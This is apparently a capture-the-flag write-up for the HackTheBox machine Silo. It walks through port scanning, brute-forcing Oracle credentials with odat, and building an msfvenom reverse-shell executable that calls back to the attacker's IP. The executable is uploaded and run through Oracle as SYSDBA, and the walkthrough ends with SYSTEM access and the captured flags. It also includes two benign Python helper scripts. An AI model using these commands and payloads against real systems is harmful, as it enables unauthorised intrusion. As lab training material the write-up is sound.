# Silo

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F9rl53uTQQ2kgrYTQVIel%2Fsilo.png?alt=media\&token=f567fa27-bec7-45d1-9457-ca3bc7bb6df1)

## Enumeration

As usual, we start with an nmap scan to find open ports on the target machine.

The following nmap command scans the whole port range quickly and saves the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.82 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scan the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, the fastest of the nmap timing templates.
* `-Pn` skip host discovery and assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

```
# Nmap 7.92 scan initiated Wed Mar  9 10:01:38 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.82
Warning: 10.10.10.82 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.82
Host is up (0.050s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  open  wsman
8080/tcp  open  http-proxy
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown
49161/tcp open  unknown
49162/tcp open  unknown

# Nmap done at Wed Mar  9 10:01:55 2022 -- 1 IP address (1 host up) scanned in 17.85 seconds
```

As we can see, a lot of ports are open. Let's try to obtain more information about the services and versions running on them.

> nmap -sC -sV -p80,135,139,445,1521,5985,8080,47001,49152,49153,49154,49155,49159,49160,49161,49162 10.10.10.82 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.
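The step from the first scan to the second is mechanical: read the `-oN` file, keep the rows whose state is `open`, and join the port numbers into the `-p` argument. The following Python script is an added example (not part of the original writeup or of nmap) that does exactly that over a constructed, trimmed copy of the `allPorts` output above. It also checks for the `retransmission cap hit` warning that appears in that output: at `-T5` with `--min-rate 5000` nmap may give up on ports, so that warning is the signal that the full-range scan is worth repeating at a gentler rate before trusting the port list.

```python
import re

# Constructed sample of `nmap -oN` (normal) output, trimmed from the allPorts scan above;
# the `filtered` row is added here to show that only `open` ports are kept.
SAMPLE_ALLPORTS = """\
# Nmap 7.92 scan initiated Wed Mar  9 10:01:38 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.82
Warning: 10.10.10.82 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.82
Host is up (0.050s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  filtered wsman
49152/tcp open  unknown
# Nmap done at Wed Mar  9 10:01:55 2022 -- 1 IP address (1 host up) scanned in 17.85 seconds
"""

# Matches the per-port table rows: "<port>/<proto>  <state>  <service>"
PORT_ROW = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_open_ports(text):
    """Return (port, proto, service) tuples for every row whose state is 'open'."""
    ports = []
    for line in text.splitlines():
        m = PORT_ROW.match(line)
        if m and m.group(3) == "open":
            ports.append((int(m.group(1)), m.group(2), m.group(4)))
    return ports


def port_spec(ports):
    """Comma-separated, sorted, de-duplicated port list for nmap's -p argument."""
    return ",".join(str(p) for p in sorted({p for p, _, _ in ports}))


def hit_retransmission_cap(text):
    """True when nmap warned that it gave up on ports because the retransmission
    cap was hit; at -T5 / --min-rate 5000 this means open ports may have been
    missed and the full-range scan is worth repeating at a slower rate."""
    return any("retransmission cap hit" in line for line in text.splitlines())


def targeted_command(text, target, outfile="targeted"):
    """Build the follow-up `nmap -sC -sV` command for the open ports found."""
    spec = port_spec(parse_open_ports(text))
    return f"nmap -sC -sV -p{spec} {target} -oN {outfile}"


if __name__ == "__main__":
    print(targeted_command(SAMPLE_ALLPORTS, "10.10.10.82"))
    if hit_retransmission_cap(SAMPLE_ALLPORTS):
        print("warning: nmap hit its retransmission cap, some open ports may be missing")
```

Run it against a real `allPorts` file by reading the file contents into `targeted_command()` instead of the embedded sample; the regex only matches the port table rows, so the header, the `Not shown:` summary and the `# Nmap done` trailer are ignored.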

```
# Nmap 7.92 scan initiated Wed Mar  9 10:04:10 2022 as: nmap -sCV -p80,135,139,445,1521,5985,8080,47001,49152,49153,49154,49155,49159,49160,49161,49162 -oN targeted 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.048s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp  open  http         Oracle XML DB Enterprise Edition httpd
|_http-server-header: Oracle XML DB/Oracle Database
|_http-title: 400 Bad Request
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=XDB
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   3.0.2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-09T09:06:20
|_  start_date: 2022-03-09T07:34:37

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar  9 10:06:22 2022 -- 1 IP address (1 host up) scanned in 132.05 seconds
```

If we enumerate the SMB service with crackmapexec, we'll see the machine is a `Windows Server 2012 R2 Standard 9600 x64`.

> crackmapexec smb 10.10.10.82

```
SMB         10.10.10.82     445    SILO             [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)
```

## Exploitation

On port *1521* there is an *Oracle TNS listener*. We can enumerate *Oracle* with the *odat* tool. It is a bit tedious to install, but let's do it. First, let's clone its [*GitHub* repository](https://github.com/quentinhardy/odat).

> git clone <https://github.com/quentinhardy/odat>

Then we'll go to the `odat/` directory and execute the following commands.

> cd odat/
>
> git submodule init
>
> git submodule update

Now, we'll have to install some libraries.

> sudo apt-get install libaio1 python3-dev alien python3-pip

As we saw with *crackmapexec*, the machine is a 64-bit (`x64`) system, so we'll go to [this](https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html) Oracle Instant Client download page and download the following files.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FiMIAnhFg9A0tLUaOKj8p%2FCaptura%20de%20pantalla%202022-03-09%20120551.png?alt=media\&token=1b76c210-ec95-41eb-ba4e-a2366af0666e)

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fk6rfkUfWxjsy1OtfB7Qa%2FCaptura%20de%20pantalla%202022-03-09%20120612.png?alt=media\&token=de43ac98-297a-4069-85f7-6984a48d478c)

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FVCS58S2LJ1W1BC9W2lOe%2FCaptura%20de%20pantalla%202022-03-09%20120630.png?alt=media\&token=c99596ff-c220-49b1-926a-b3eadf7b0502)

Now that we have all these `.rpm` files, we'll have to use *alien* to convert them to `.deb` packages.

> alien --to-deb \*.rpm

Once we have the `.deb` files, we'll install them with *dpkg*.

> dpkg -i \*.deb

Next, let's install the `cx_Oracle` Python module.

> pip3 install cx\_Oracle

Then, we'll export some environment variables.

> export ORACLE\_HOME=/usr/lib/oracle/21/client64/
>
> export LD\_LIBRARY\_PATH=$LD\_LIBRARY\_PATH:$ORACLE\_HOME/lib
>
> export PATH=${ORACLE\_HOME}bin:$PATH

Then, install some more libraries and modules.

> apt-get install python3-scapy
>
> pip3 install colorlog termcolor pycrypto passlib python-libnmap
>
> pip3 install argcomplete && sudo activate-global-python-argcomplete

Finally, we can run the *odat* tool.

{% hint style="warning" %}
If an error appears saying that a module is missing, you can always search for it on the internet.
{% endhint %}

> python3 odat.py --help

```
usage: odat.py [-h] [--version]
               {all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
               ...

            _  __   _  ___ 
           / \|  \ / \|_ _|
          ( o ) o ) o || | 
           \_/|__/|_n_||_| 
-------------------------------------------
  _        __           _           ___ 
 / \      |  \         / \         |_ _|
( o )       o )         o |         | | 
 \_/racle |__/atabase |_n_|ttacking |_|ool 
-------------------------------------------

By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)

positional arguments:
  {all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
                      
                      Choose a main command
    all               to run all modules in order to know what it is possible to do
    tnscmd            to communicate with the TNS listener
    tnspoison         to exploit TNS poisoning attack (SID required)
    sidguesser        to know valid SIDs
    snguesser         to know valid Service Name(s)
    passwordguesser   to know valid credentials
    utlhttp           to send HTTP requests or to scan ports
    httpuritype       to send HTTP requests or to scan ports
    utltcp            to scan ports
    ctxsys            to read files
    externaltable     to read files or to execute system commands/scripts
    dbmsxslprocessor  to upload files
    dbmsadvisor       to upload files
    utlfile           to download/upload/delete files
    dbmsscheduler     to execute system commands without a standard output
    java              to execute system commands
    passwordstealer   to get hashed Oracle passwords
    oradbg            to execute a bin or script
    dbmslob           to download files
    stealremotepwds   to steal hashed passwords thanks an authentication sniffing (CVE-2012-3137)
    userlikepwd       to try each Oracle username stored in the DB like the corresponding pwd
    smb               to capture the SMB authentication
    privesc           to gain elevated access
    cve               to exploit a CVE
    search            to search in databases, tables and columns
    unwrapper         to unwrap PL/SQL source code (no for 9i version)
    clean             clean traces and logs

optional arguments:
  -h, --help          show this help message and exit
  --version           show program's version number and exit
```

To perform any attack with *odat*, we'll need a *SID*, so we use the `sidguesser` option to discover valid *SIDs*.

> python3 odat.py sidguesser -s 10.10.10.82

* `-s` **server**.

```
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...                 #####################################################################################################################################################################  | ETA:  00:00:00 
```

It found `XE` as a valid *SID*. Now we can try to brute force credentials with the `passwordguesser` option. I will be using the `/usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt` *metasploit* dictionary. If you look at the dictionary, you'll see that it uses the `user password` format, but odat only accepts the `user/password` format, so let's change the dictionary format.

> cat /usr/share/metasploit-framework/data/wordlists/oracle\_default\_userpass.txt | tr ' ' '/' > dictionary

Now we can brute force credentials with *odat*.

> python3 odat.py passwordguesser -s 10.10.10.82 -d XE --accounts-file dictionary

* `-s` **server**.
* `-d` oracle System ID (**SID**).
* `--accounts-file` **file** containing Oracle credentials.

```
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
12:36:22 WARNING -: The line 'jl/jl/\n' is not loaded in credentials list: ['jl', 'jl', '']
12:36:22 WARNING -: The line 'ose$http$admin/invalid/password\n' is not loaded in credentials list: ['ose$http$admin', 'invalid', 'password']
The login brio_admin has already been tested at least once. What do you want to do:                                                                                                                                         | ETA:  --:--:-- 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c

[!] Notice: 'ctxsys' account is locked, so skipping this username for password                                                                                                                                              | ETA:  00:06:14 
[!] Notice: 'hr' account is locked, so skipping this username for password                                                                                                                                                  | ETA:  00:05:25 
[!] Notice: 'mdsys' account is locked, so skipping this username for password                                                                                                                                               | ETA:  00:03:44 
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password                                                                                                                                              | ETA:  00:02:55 
[!] Notice: 'dip' account is locked, so skipping this username for password########                                                                                                                                         | ETA:  00:02:49 
[!] Notice: 'system' account is locked, so skipping this username for password###############################################                                                                                               | ETA:  00:01:52 
[!] Notice: 'xdb' account is locked, so skipping this username for password#######################################################################################                                                          | ETA:  00:01:04 
[!] Notice: 'outln' account is locked, so skipping this username for password##################################################################################################                                             | ETA:  00:00:49 
[+] Valid credentials found: scott/tiger. Continue... #############################################################################################################################################################         | ETA:  00:00:09 
100% |######################################################################################################################################################################################################################| Time: 00:03:58 
[+] Accounts found on 10.10.10.82:1521/sid:XE: 
scott/tiger
```
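The two `WARNING` lines at the top of that output are worth a second look: `tr ' ' '/'` replaces every space, so a wordlist entry with trailing whitespace (`jl jl `) becomes `jl/jl/` and an entry whose password contains a space (`ose$http$admin invalid password`) becomes `ose$http$admin/invalid/password`. odat splits each line on `/`, gets three fields instead of two, and silently drops the entry. The following Python script is an added example (not part of the original writeup or of odat) that converts the dictionary by splitting on the first space only and trimming trailing whitespace, and reports the lines it had to reject instead of letting them vanish. The sample wordlist inside it is constructed to mirror those two entries.

```python
# Constructed sample in the `user password` layout of the metasploit wordlist. The
# third and fourth lines imitate the entries that the `tr ' ' '/'` one-liner mangled
# (trailing whitespace, a password containing a space); the last one carries a '/',
# which odat cannot represent because it splits the account line on '/'.
SAMPLE_WORDLIST = """\
scott tiger
system manager
jl jl 
ose$http$admin invalid password
bad/user secret
"""


def convert_line(line):
    """Convert one `user password` line to odat's `user/password` form.

    Splits on the FIRST space only, so a password containing spaces stays intact,
    and trims trailing whitespace, so `jl jl ` does not become `jl/jl/`.
    Returns None for lines odat could not load: no password at all, or a '/'
    in the user or the password."""
    line = line.rstrip()
    if not line:
        return None
    user, sep, password = line.partition(" ")
    if not sep or not password or "/" in user or "/" in password:
        return None
    return f"{user}/{password}"


def convert_wordlist(text):
    """Return (converted, rejected): odat-formatted lines and the non-empty raw
    lines that had to be dropped, so nothing disappears silently."""
    converted, rejected = [], []
    for raw in text.splitlines():
        out = convert_line(raw)
        if out is None:
            if raw.strip():
                rejected.append(raw)
        else:
            converted.append(out)
    return converted, rejected


if __name__ == "__main__":
    import sys
    # With a path argument the real wordlist is converted; otherwise the sample is used.
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_WORDLIST
    ok, bad = convert_wordlist(src)
    print("\n".join(ok))
    for line in bad:
        print(f"skipped: {line!r}", file=sys.stderr)
```

Redirect stdout to the `dictionary` file and stderr stays on the terminal, so the rejected entries are visible while the converted list is written.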

It found the user `scott` and the password `tiger`. Now that we have valid credentials, we can upload files with the `utlfile` option. Let's create a malicious binary with *msfvenom* which will send us a reverse shell.

> msfvenom -p windows/x64/shell\_reverse\_tcp lhost=10.10.14.5 lport=4444 -f exe -o shell.exe

* `-p` indicates the type of **payload**.
* `lhost` local **host** IP.
* `lport` local **port** of the listener.
* `-f` output **format**.
* `-o` save the output to a **file**.

```
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
```

Now, let's upload it to the `/Temp` directory on the machine with *odat*.

> python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --putFile /Temp shell.exe shell.exe

* `-s` **server**.
* `-d` oracle System ID (**SID**).
* `-U` oracle **username**.
* `-P` oracle **password**.
* `--putFile` **put a file** to the remote database server.

```
[1] (10.10.10.82:1521): Put the /home/alfa8sa/HTB/machines/silo/shell.exe local file in the /Temp folder like shell.exe on the 10.10.10.82 server
[-] Impossible to put the /home/alfa8sa/HTB/machines/silo/shell.exe file: `ORA-01031: insufficient privileges`
```

We get an error saying that we have insufficient privileges. Don't worry, we can use the `--sysdba` option to connect with the `SYSDBA` role.

> python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --putFile /Temp shell.exe shell.exe --sysdba

* `-s` **server**.
* `-d` oracle System ID (**SID**).
* `-U` oracle **username**.
* `-P` oracle **password**.
* `--putFile` **put a file** to the remote database server.
* `--sysdba` connection as **SYSDBA**.

```
[1] (10.10.10.82:1521): Put the /home/alfa8sa/HTB/machines/silo/shell.exe local file in the /Temp folder like shell.exe on the 10.10.10.82 server
[+] The /home/alfa8sa/HTB/machines/silo/shell.exe file was created on the /Temp directory on the 10.10.10.82 server like the shell.exe file
```

Now that the binary is uploaded, we want to execute it. We can do it with the `externaltable` option. But first, let's set a *netcat* listener on port *4444*.

> nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

The following command will execute the `shell.exe` binary, and we will catch the reverse shell on the *netcat* listener.

> python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --exec /Temp shell.exe --sysdba

* `-s` **server**.
* `-d` oracle System ID (**SID**).
* `-U` oracle **username**.
* `-P` oracle **password**.
* `--exec` **execute** a system command on the remote system.
* `--sysdba` connection as **SYSDBA**.

```
[1] (10.10.10.82:1521): Execute the shell.exe command stored in the /Temp path
```

Since we get the shell as the `nt authority\system` user, all we have to do is reap the harvest and take both the user flag and the root flag.

```
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.82] 49184
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type \users\phineas\desktop\user.txt
type \users\phineas\desktop\user.txt
ad6364c9113c9f1e283264078a94925c

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
8800ec7febdb70445e705e31dc7c0c33
```
